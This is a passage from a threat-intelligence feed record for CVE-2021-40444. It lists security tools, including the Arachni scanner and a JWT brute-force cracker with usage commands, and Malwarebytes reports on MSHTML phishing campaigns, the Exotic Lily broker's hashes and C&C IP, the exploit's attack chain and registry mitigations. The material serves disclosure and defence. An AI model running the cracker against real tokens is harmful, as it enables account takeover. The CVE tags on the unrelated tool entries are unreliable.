` ) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes. \n * BeepNotify ( ` beep_notify ` ) -- Beeps when the scan finishes. \n * EmailNotify ( ` email_notify ` ) -- Sends a notification (and optionally a report) over SMTP at the end of the scan. \n * VectorFeed ( ` vector_feed ` ) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things. \n * Script ( ` script ` ) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery. \n * Uncommon headers ( ` uncommon_headers ` ) -- Logs uncommon headers. \n * Content-types ( ` content_types ` ) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files. \n * Vector collector ( ` vector_collector ` ) -- Collects information about all seen input vectors which are within the scan scope. \n * Headers collector ( ` headers_collector ` ) -- Collects response headers based on specified criteria. \n * Exec ( ` exec ` ) -- Calls external executables at different scan stages. \n * Metrics ( ` metrics ` ) -- Captures metrics about multiple aspects of the scan and the web application. \n * Restrict to DOM state ( ` restrict_to_dom_state ` ) -- Restricts the audit to a single page's DOM state, based on a URL fragment. \n * Webhook notify ( ` webhook_notify ` ) -- Sends a webhook payload over HTTP at the end of the scan. \n * Rate limiter ( ` rate_limiter ` ) -- Rate limits HTTP requests. \n * Page dump ( ` page_dump ` ) -- Dumps page data to disk as YAML. \n\n \n\n\n** Defaults **\n\nDefault plugins will run for every scan and are placed under ` /plugins/defaults/ ` . \n\n * AutoThrottle ( ` autothrottle ` ) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization. \n * Healthmap ( ` healthmap ` ) -- Generates sitemap showing the health of each crawled/audited URL \n\n \n\n\n** Meta **\n\nPlugins under ` /plugins/defaults/meta/ ` perform analysis on the scan results to determine trustworthiness or just add context information or general insights. \n\n * TimingAttacks ( ` timing_attacks ` ) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing. \n * Discovery ( ` discovery ` ) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable. \n * Uniformity ( ` uniformity ` ) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization. \n\n \n\n\n** Trainer subsystem **\n\nThe Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit. \n\nChecks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce. \n\nHowever, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly. \n\nStill, this can be an invaluable asset to Fuzzer checks. \n\n \n** [ Installation ](<https://github.com/Arachni/arachni/wiki/Installation>) ** \n \n** [ Usage ](<https://github.com/Arachni/arachni/wiki/User-guide>) ** \n \n** Running the specs ** \nYou can run ` rake spec ` to run ** all ** specs or you can run them selectively using the following: \n\n \n \n rake spec:core # for the core libraries\n rake spec:checks # for the checks\n rake spec:plugins # for the plugins\n rake spec:reports # for the reports\n rake spec:path_extractors # for the path extractors\n\n** Please be warned ** , the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system. \n** Note ** : _ The check specs will take many hours to complete due to the timing-attack tests. _ \n \n \n\n\n** [ Download Arachni ](<https://github.com/Arachni/arachni>) **\n", "cvss3": {}, "published": "2017-08-01T14:32:01", "type": "kitploit", "title": "Arachni v1.5.1 - Web Application Security Scanner Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-01T14:32:01", "id": "KITPLOIT:5230148353750207837", "href": "http://www.kitploit.com/2017/08/arachni-v151-web-application-security.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-23T20:37:55", "description": "[  ](<https://3.bp.blogspot.com/-9hFQ5Yv3Gu8/WYc-1er2-hI/AAAAAAAAIc8/6cU2xfWuZF01B_fRxg8LfwmDlv7ONo24gCLcBGAs/s1600/jwt-cracker.png>)\n\n \nSimple HS256 JWT token brute force cracker. \nEffective only to crack JWT tokens with weak secrets. \n** Recommendation ** : Use strong long secrets or RS256 tokens. \n \n** Install ** \nWith npm: \n\n \n \n npm install --global jwt-cracker\n\n \n** Usage ** \nFrom command line: \n\n \n \n jwt-cracker <token> [<alphabet>] [<maxLength>]\n\nWhere: \n\n\n * ** token ** : the full HS256 JWT token string to crack \n * ** alphabet ** : the alphabet to use for the brute force (default: \"abcdefghijklmnopqrstuwxyzABCDEFGHIJKLMNOPQRSTUWXYZ0123456789\") \n * ** maxLength ** : the max length of the string generated during the brute force (default: 12) \n \n** Requirements ** \nThis script requires Node.js version 6.0.0 or higher \n \n** Example ** \nCracking the default [ jwt.io example ](<https://jwt.io/>) : \n\n \n \n jwt-cracker \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\" \"abcdefghijklmnopqrstuwxyz\" 6\n\nIt takes about 2 hours in a Macbook Pro (2.5GHz quad-core Intel Core i7). \n \n \n\n\n** [ Download jwt-cracker ](<https://github.com/lmammino/jwt-cracker>) **\n", "cvss3": {}, "published": "2017-08-06T16:08:58", "type": "kitploit", "title": "jwt-cracker - Simple HS256 JWT Token Brute Force Cracker", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-06T16:08:58", "id": "KITPLOIT:4074521293617632933", "href": "http://www.kitploit.com/2017/08/jwt-cracker-simple-hs256-jwt-token.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the 'Enable Editing' buttons. Sadly, experience has learned us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office's Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we've witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We've also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Beside those known groups we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the "Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation" and "Federal Service for Supervision of Communications, Information Technology and Mass Communications" of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, 